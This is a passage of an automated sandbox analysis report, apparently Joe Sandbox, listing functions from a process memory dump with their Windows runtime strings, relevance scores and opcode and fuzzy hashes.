                                                                  Strings
                                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 2CDD063D
                                                                  • kLsE, xrefs: 2CDD0540
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                  • API String ID: 0-2547482624
                                                                  • Opcode ID: 65aadb51937456d2c0c175059d905af4283fb64df0b77efa45f2f4a36fe8cab8
                                                                  • Instruction ID: c3725286b0b7c756e85d36617b34b7ee7e0cbd3c955299a2deebae6b02a605aa
                                                                  • Opcode Fuzzy Hash: 65aadb51937456d2c0c175059d905af4283fb64df0b77efa45f2f4a36fe8cab8
                                                                  • Instruction Fuzzy Hash: A751AC739187429BC314DF25C440697BBE4AFC9300F51493EEAAA87261E774E649CBE2
                                                                  Function 2CE02E9C Relevance: 2.6, Strings: 2, Instructions: 130COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand, xrefs: 2CE4280C
                                                                  • RtlpInsertAssemblyStorageMapEntry, xrefs: 2CE42807
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RtlpInsertAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand
                                                                  • API String ID: 0-2104531740
                                                                  • Opcode ID: fdb97952b253e90b8026ce8500da21e8b380a13f4a6c8e7363329ca1f6463a82
                                                                  • Instruction ID: 43545c4e7cf1abadeeeeca22680e4bafc408b50343fe738915b56d9d954d086a
                                                                  • Opcode Fuzzy Hash: fdb97952b253e90b8026ce8500da21e8b380a13f4a6c8e7363329ca1f6463a82
                                                                  • Instruction Fuzzy Hash: 33411136A01212EBD725CF55D880E6AB3F5FF94B54F21806DE948AB650E730DD81CBA0
                                                                  Function 2CE10FF6 Relevance: 2.6, Strings: 2, Instructions: 92COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • \Registry\Machine\System\CurrentControlSet\Control, xrefs: 2CE11025
                                                                  • @, xrefs: 2CE11050
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$\Registry\Machine\System\CurrentControlSet\Control
                                                                  • API String ID: 0-2976085014
                                                                  • Opcode ID: ffe69d47a8bb675df98a90d6aa41d067ba7d17e73e2691fe2082a06d4fb2ba0d
                                                                  • Instruction ID: 77f35236c386854438fb9da49e447cb099c2d7c16b1d15118092dc6b5afe07fe
                                                                  • Opcode Fuzzy Hash: ffe69d47a8bb675df98a90d6aa41d067ba7d17e73e2691fe2082a06d4fb2ba0d
                                                                  • Instruction Fuzzy Hash: 8731AD72901589AFCB12CBA5CC84EDFBBB8EB84B50F000465E500A7260DBB4CD55CBA0
                                                                  Function 2CE0A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID: Cleanup Group$Threadpool!
                                                                  • API String ID: 2994545307-4008356553
                                                                  • Opcode ID: e475faeae98fa51e2ec5a986fc583c1ef19bdd029429525b2a984565b445be25
                                                                  • Instruction ID: e311281c11dbc4e23d2b33d477bb46278b8b3ca11c257aa462810279c8bd65c4
                                                                  • Opcode Fuzzy Hash: e475faeae98fa51e2ec5a986fc583c1ef19bdd029429525b2a984565b445be25
                                                                  • Instruction Fuzzy Hash: F601DCB2290A08AFE311CF24CD45F2677F8EB44719F00893DA658DB190E334D909CB8A
                                                                  Function 2CDDC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: MUI
                                                                  • API String ID: 0-1339004836
                                                                  • Opcode ID: d757511d3f6d87c6345644ca47493df9b348697b5c28eea146ae307b1247c4d3
                                                                  • Instruction ID: 3847716872f561abcf3d35504f0a546d3f75e3a0540b4fa566c9ed5cedfa48d0
                                                                  • Opcode Fuzzy Hash: d757511d3f6d87c6345644ca47493df9b348697b5c28eea146ae307b1247c4d3
                                                                  • Instruction Fuzzy Hash: 35828D77E056198FDF20CFA9C880BEDB7B5BF85300F22856DD959AB260D7309985CB50
                                                                  Function 2CDD2FC8 Relevance: 1.7, Strings: 1, Instructions: 410COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: PATH
                                                                  • API String ID: 0-1036084923
                                                                  • Opcode ID: 41da6aab7e7fe8d4220c49ac171d8c72e5ec827ac2aaa23d37e741658799d8b2
                                                                  • Instruction ID: 361588b476df8e2b7bab346c75beba920ae6cc09cb66a7b5f4ada25b96ae1021
                                                                  • Opcode Fuzzy Hash: 41da6aab7e7fe8d4220c49ac171d8c72e5ec827ac2aaa23d37e741658799d8b2
                                                                  • Instruction Fuzzy Hash: 86F1AEB3E00219DBCB15CF98C980EEEB7B5FF48700F56402DE949AB260D7349A95CB60
                                                                  Function 2CE6CC20 Relevance: 1.6, Strings: 1, Instructions: 353COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: w
                                                                  • API String ID: 0-476252946
                                                                  • Opcode ID: 208afb77b63ccb79a5101148baabb5265054c2854209f2ef4f887076df02490a
                                                                  • Instruction ID: 3260ef63fe2b8356fb1d19304d0115f9548c0b433b13765490c539868471373d
                                                                  • Opcode Fuzzy Hash: 208afb77b63ccb79a5101148baabb5265054c2854209f2ef4f887076df02490a
                                                                  • Instruction Fuzzy Hash: B6D1EF30954616EBCB14CF55C482ABFFBF2FF44708F208559E8999BA41E335EA92C790
                                                                  Function 2CE74C34 Relevance: 1.5, Strings: 1, Instructions: 271COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @
                                                                  • API String ID: 0-2766056989
                                                                  • Opcode ID: 89f527b55bfe7a4f0811dd71fcfc3e06bd55def568a9094adf0b6a96f076d154
                                                                  • Instruction ID: 872174858996178f5bdb0a3c56c3807cab35f1901735b8880e3a1515a25ad673
                                                                  • Opcode Fuzzy Hash: 89f527b55bfe7a4f0811dd71fcfc3e06bd55def568a9094adf0b6a96f076d154
                                                                  • Instruction Fuzzy Hash: 34A150B1E0520AAFDB05DF98C981EEEB7B9FF18744F104029EA15AB250E7749D48CF60
                                                                  Function 2CE56420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID: 0-3916222277
                                                                  • Opcode ID: 39897cc4dfdf0a8bbe539a728214a1de9f2f58eee972a048437dfcd835dd29f7
                                                                  • Instruction ID: 186828e72e0b5b8a1899e6006d65903951cc7c354e3499db2720b9a018a190d3
                                                                  • Opcode Fuzzy Hash: 39897cc4dfdf0a8bbe539a728214a1de9f2f58eee972a048437dfcd835dd29f7
                                                                  • Instruction Fuzzy Hash: 759171B2A41219EFDB11CF95CC85FEE77B8EF14B50F210169F604AB2A0D675AD44CBA0
                                                                  Function 2CE0A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: GlobalTags
                                                                  • API String ID: 0-1106856819
                                                                  • Opcode ID: 15cf0310818fa656386b87da140f378a9a4421f16c0f146bc87cedeb15ba9e2b
                                                                  • Instruction ID: fbe2486f930d6837193f1ac51ad60490c927c3f10cf2a6fa6bf1f6e8b91817e3
                                                                  • Opcode Fuzzy Hash: 15cf0310818fa656386b87da140f378a9a4421f16c0f146bc87cedeb15ba9e2b
                                                                  • Instruction Fuzzy Hash: 9171BEB5E0530ACFDB28CF99E490ADDBBB5BF48704F20812EE805B7241E7358945CB60
                                                                  Function 2CDFEDD3 Relevance: 1.4, Strings: 1, Instructions: 166COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: \,
                                                                  • API String ID: 0-2448794073
                                                                  • Opcode ID: 28b3f5ee13c8444cd47634a97f6f89490c07f37aca0efe10c243e73069f8e53e
                                                                  • Instruction ID: d87f49895e7a10879c7c88ea01729d4518e40b775de6b0392c83c6651d69c9d4
                                                                  • Opcode Fuzzy Hash: 28b3f5ee13c8444cd47634a97f6f89490c07f37aca0efe10c243e73069f8e53e
                                                                  • Instruction Fuzzy Hash: 26518CB1600785DFD720CB66C884B6BB3F9BF5421DF11092DE14A87A61D7B4F988CB91
                                                                  Function 2CE74978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: .mui
                                                                  • API String ID: 0-1199573805
                                                                  • Opcode ID: 0c3e3f3bf4c0330923fddd026af61397ebeeb46144da241bfcac1271ca122a58
                                                                  • Instruction ID: 9c72c8e5595e27d30c7064c00a9820eca56f3f7915484fa637dc0612239fbd41
                                                                  • Opcode Fuzzy Hash: 0c3e3f3bf4c0330923fddd026af61397ebeeb46144da241bfcac1271ca122a58
                                                                  • Instruction Fuzzy Hash: C75180B2D0122ADBCF01CFA9D840EEEB7B4EF19654F05416AE915BB250E7348D09CFA4
                                                                  Function 2CE98B28 Relevance: 1.4, Strings: 1, Instructions: 152COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Ph,
                                                                  • API String ID: 0-933478797
                                                                  • Opcode ID: 1dde4c8982ff18bb740e3ae2a8a9a21c5238396d9e09fa4b6a31a8a4ea94f230
                                                                  • Instruction ID: f343964d18067c06769c2f74b2b93506550a1d88fc12275e5f8de68e83ad0065
                                                                  • Opcode Fuzzy Hash: 1dde4c8982ff18bb740e3ae2a8a9a21c5238396d9e09fa4b6a31a8a4ea94f230
                                                                  • Instruction Fuzzy Hash: EC412B7070A6019BC725CB29C890F6FB7DAEF91264F148219F935873A0E730D941C791
                                                                  Function 2CDEE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: EXT-
                                                                  • API String ID: 0-1948896318
                                                                  • Opcode ID: 89307ef9180447ca53ff56149726cdbcca83adbdba4b06e7207936760a36f7c8
                                                                  • Instruction ID: 35d1c0fae4265425a56883fd7e36d880a594ff30ec570ab28aebc0a56bffcca2
                                                                  • Opcode Fuzzy Hash: 89307ef9180447ca53ff56149726cdbcca83adbdba4b06e7207936760a36f7c8
                                                                  • Instruction Fuzzy Hash: 1E41A1725093919BD710EB76D840BABB7D8AF88704F400A2DF58CD7560E774D948C7A6
                                                                  Function 2CDCCDEA Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: AlternateCodePage
                                                                  • API String ID: 0-3889302423
                                                                  • Opcode ID: 71818ad0acad570318076ddd0094d52e94d77e23dc7165a71254996d9c00713d
                                                                  • Instruction ID: 5a2b6d5b7412e078d0d52e92f706af37f57f3c7924fe6ea64574e0c21ba32f5c
                                                                  • Opcode Fuzzy Hash: 71818ad0acad570318076ddd0094d52e94d77e23dc7165a71254996d9c00713d
                                                                  • Instruction Fuzzy Hash: C241D072981609ABEB14CB94C880BEFB7B8FF85310F20415EE615E3260D6749B85CB51
                                                                  Function 2CDFEBFC Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: \,
                                                                  • API String ID: 0-2448794073
                                                                  • Opcode ID: 296c2a4b6c1e4531ce03099d8e3cd89677da70cbb153420c89404eee078ef113
                                                                  • Instruction ID: 9ecc3cdf865cdd0ca0df1c400d33cba35ac9c08cdf2e1eefcd4e32e07bfa8043
                                                                  • Opcode Fuzzy Hash: 296c2a4b6c1e4531ce03099d8e3cd89677da70cbb153420c89404eee078ef113
                                                                  • Instruction Fuzzy Hash: CA41E2B22043419FD710CF35C894E5BB7E9FF88218F01496DE99AC7A21DB75E988CB61
                                                                  Function 2CDD0BCD Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: pf,
                                                                  • API String ID: 0-2403302106
                                                                  • Opcode ID: 31320af88e25ba28f137b793f701cbf5ebcb0bfd201899e3193d8eb0c9786035
                                                                  • Instruction ID: 2aaf299bef42306d9fe0706b251fb4bae706ca6bab704080cdb43b6ec7c459cb
                                                                  • Opcode Fuzzy Hash: 31320af88e25ba28f137b793f701cbf5ebcb0bfd201899e3193d8eb0c9786035
                                                                  • Instruction Fuzzy Hash: 0E41A372E006689FCB21DF69D940FDA77B8EF85740F4100A9E948AB251D774EE84CBA1
                                                                  Function 2CE4C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: BinaryHash
                                                                  • API String ID: 0-2202222882
                                                                  • Opcode ID: aeba774ea06bec72cbffd2c70bebc4ff89a0a927a6bf5034e8cd4c6a5acb3ef6
                                                                  • Instruction ID: c115f3b2edcc12c2cd1202f75adc2f6a96349a33be56436915b8943921764930
                                                                  • Opcode Fuzzy Hash: aeba774ea06bec72cbffd2c70bebc4ff89a0a927a6bf5034e8cd4c6a5acb3ef6
                                                                  • Instruction Fuzzy Hash: 114170B2D0162CABDB21CB60DC80FDE777CAB54714F0045E5AA18BB150DB749E89CFA5
                                                                  Function 2CDFA470 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @3,
                                                                  • API String ID: 0-2075540940
                                                                  • Opcode ID: 01afaaba6e17ee40d43e077bdac184afa16a2ca36a1c52942688a9b1e1516147
                                                                  • Instruction ID: fea1f1657e45a28d904d86504879feb7ae2a8b7da2b532b7d6afe4e02f5d2211
                                                                  • Opcode Fuzzy Hash: 01afaaba6e17ee40d43e077bdac184afa16a2ca36a1c52942688a9b1e1516147
                                                                  • Instruction Fuzzy Hash: 3E419F32A85258CFCB12DF64C491BAD77B4BF14354F11216DD859BB3B1DB349A44CBA0
                                                                  Function 2CE4CCA0 Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: TrustedInstaller
                                                                  • API String ID: 0-565535830
                                                                  • Opcode ID: f3c7fda56fdcd52c277f2cabfa92c973f83e0fccc125bdb93f6afe2579233fdd
                                                                  • Instruction ID: 403578386fba66ff1e91d939f110daa80da4c1045bfdf6fa2c199c099b84ba38
                                                                  • Opcode Fuzzy Hash: f3c7fda56fdcd52c277f2cabfa92c973f83e0fccc125bdb93f6afe2579233fdd
                                                                  • Instruction Fuzzy Hash: 1B31A132D41A19BFDB229B94DC40FEEBB79EF54740F010169FA00AB260D671CE85CBA0
                                                                  Function 2CE66B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: #
                                                                  • API String ID: 0-1885708031
                                                                  • Opcode ID: 7c505e39fa1ee0a0af4d70ff1dda0bd0b47f30fe75e6ab34f4cc918796d2c0a2
                                                                  • Instruction ID: bdff6ae2d0a8f27ef58cb8d5138af31a757c982f81e761cb31875cfb5c816c36
                                                                  • Opcode Fuzzy Hash: 7c505e39fa1ee0a0af4d70ff1dda0bd0b47f30fe75e6ab34f4cc918796d2c0a2
                                                                  • Instruction Fuzzy Hash: D5312471664B099BDB22CB69C840FEE77BCDF4570CF204068E940AB682DBB5DD45CB90
                                                                  Function 2CE70F50 Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @
                                                                  • API String ID: 0-2766056989
                                                                  • Opcode ID: 82e9b14cf91a5a6f37c9e4009f2ae5fbb7a03b243ebd8f8edba72d545418d4d2
                                                                  • Instruction ID: 7c7beb914f9cb94d6784b093b6f5f3ace623273199daf53598ce838878e85cb4
                                                                  • Opcode Fuzzy Hash: 82e9b14cf91a5a6f37c9e4009f2ae5fbb7a03b243ebd8f8edba72d545418d4d2
                                                                  • Instruction Fuzzy Hash: 89318D71119385AFD311CF14CC49E9BBBF8EB94754F404A2EB59492290E7B0E94CCB92
                                                                  Function 2CE4CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: BinaryName
                                                                  • API String ID: 0-215506332
                                                                  • Opcode ID: b27e6774f5e3fa6033867f9862dc941af7320e2470b7994cf5ec5491838e9b48
                                                                  • Instruction ID: 424420cd7a7fcd85be1671a0636aed1b86abe0c951f03520ad5f897d909c0156
                                                                  • Opcode Fuzzy Hash: b27e6774f5e3fa6033867f9862dc941af7320e2470b7994cf5ec5491838e9b48
                                                                  • Instruction Fuzzy Hash: E6313136E0291AAFEB26CB49D844EAFB774EB80764F014569A915A7260D7309E04CBF0
                                                                  Function 2CE6AEB0 Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 2CE6AF2F
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                  • API String ID: 0-1911121157
                                                                  • Opcode ID: f45f12739e55759a093ca293aad534a6a25fc40b5f7e264561a04e043eae7d4c
                                                                  • Instruction ID: 054249dfe0296c156d34a78df9204ad68224ff6eee2c29ea3533eab47a81faf4
                                                                  • Opcode Fuzzy Hash: f45f12739e55759a093ca293aad534a6a25fc40b5f7e264561a04e043eae7d4c
                                                                  • Instruction Fuzzy Hash: 163135B2E84604AFD700DF64CD41F9EBBB9FB44714F218665F611A7640D738AE81CBA1
                                                                  Function 2CDF8CB1 Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: WindowsExcludedProcs
                                                                  • API String ID: 0-3583428290
                                                                  • Opcode ID: 34a5547e051765790c2c8ceff76a078c61e809f66b40f98c98d16d0ff40d25f6
                                                                  • Instruction ID: 513cbd6f899f40ad8f0708e2efef1726a56f1fe76ed49027643a2b1b323fd64f
                                                                  • Opcode Fuzzy Hash: 34a5547e051765790c2c8ceff76a078c61e809f66b40f98c98d16d0ff40d25f6
                                                                  • Instruction Fuzzy Hash: B9212237646115AFCB128A558C40F9F77BCBFA2AA0F22016AFA049F124C630DE00C7B2
                                                                  Function 2CE86FF7 Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • Critical error detected %lx, xrefs: 2CE87027
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Critical error detected %lx
                                                                  • API String ID: 0-802127002
                                                                  • Opcode ID: 02495d10aecda2d3f9d6a97b246fc44b15ed21787811a22c6bf9a3f149bdb520
                                                                  • Instruction ID: 1955192db777b1d3593ac244368d8eb7f3457a503a1d70f387f5c924085ff2d0
                                                                  • Opcode Fuzzy Hash: 02495d10aecda2d3f9d6a97b246fc44b15ed21787811a22c6bf9a3f149bdb520
                                                                  • Instruction Fuzzy Hash: F2117976D143088BDB25CFA4C942BDDBBB1EB04318F20422EE129BB292D7754A42CF15
                                                                  Function 2CE5892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 2CE5895E
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                  • API String ID: 0-702105204
                                                                  • Opcode ID: 21613456ff61287343b00030311724805230360ab9342afbd4291314cd04bfe1
                                                                  • Instruction ID: bee95edfadc6eb35eec98b4b5f5222464a30607f40c8d88ea27dc87df63d8d61
                                                                  • Opcode Fuzzy Hash: 21613456ff61287343b00030311724805230360ab9342afbd4291314cd04bfe1
                                                                  • Instruction Fuzzy Hash: 2F017BB33062109FD7244B11CCC4FA6B7B4EFD52E4B00202CE65512121CF20AD85C6A2
                                                                  Function 2CE72000 Relevance: .8, Instructions: 757COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 98897b09459fa25522fbccc62c18078cb41979476861af75bf8691e14e605a3a
                                                                  • Instruction ID: 46a28e07397c9e4c5daf95898150e777e9bb8dc213295f93863fb3a5b64a08f5
